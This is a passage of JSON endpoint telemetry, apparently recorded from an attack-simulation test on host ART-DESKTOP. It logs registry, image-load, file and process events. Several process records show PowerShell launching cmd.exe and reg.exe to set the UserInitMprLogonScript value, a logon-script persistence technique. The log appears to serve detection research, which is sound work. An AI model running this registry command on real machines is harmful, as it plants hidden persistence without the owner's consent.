"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wwapi.dll", - "image_path": "C:\\Windows\\System32\\wwapi.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573251360000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573251509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4436, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573253050000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573252920000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573252920000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "command_line": "REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6488, - "ppid": 4436, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883573253160000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}", - "unique_ppid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883573253080000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "registry", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", - "registry_value": "Environment", - "timestamp": 131883573253230000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "timestamp": 131883573279020000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573279020000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-CD4ED1A8.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-CD4ED1A8.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573351680000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "REG.EXE-26976709.pf", - "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573354020000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573415119984, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573415270000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment\\UserInitMprLogonScript", - "registry_value": "UserInitMprLogonScript", - "timestamp": 131883573444170000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "process", - "pid": 6488, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883573444170000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" - }, - { - "event_type": "process", - "pid": 4436, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573444170000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2900, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573444370000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": "{42FC7E13-CBE0-5C05-0000-001058C05401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2900, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573444330000, - "unique_pid": 